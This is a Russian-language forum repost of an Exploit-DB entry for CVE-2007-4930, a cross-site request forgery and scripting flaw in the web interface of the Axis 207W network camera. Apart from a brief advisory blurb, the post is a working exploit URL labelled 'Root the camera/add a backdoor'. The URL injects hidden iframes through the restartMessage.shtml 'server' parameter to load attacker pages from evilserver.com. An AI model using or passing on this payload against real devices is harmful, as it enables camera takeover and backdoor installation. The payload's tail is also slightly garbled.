Exploit Axis Communications 207W Network Camera - Web Interface '/admin/restartMessage.shtml?server' Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30587
Проверка EDB
  1. Пройдено
Автор
SETH FOGIE
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2007-4930
Дата публикации
2007-09-14
Код:
source: https://www.securityfocus.com/bid/25678/info
  
Axis Communications 207W Network Camera is prone to multiple vulnerabilities in the web interface. Three issues were reported: a cross-site scripting vulnerability, a cross-site request-forgery vulnerability, and a denial-of-service vulnerability.
  
Exploiting these issues may allow an attacker to compromise the device or to prevent other users from using the device.

Root the camera/add a backdoor -  
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??
 
Источник
www.exploit-db.com

Похожие темы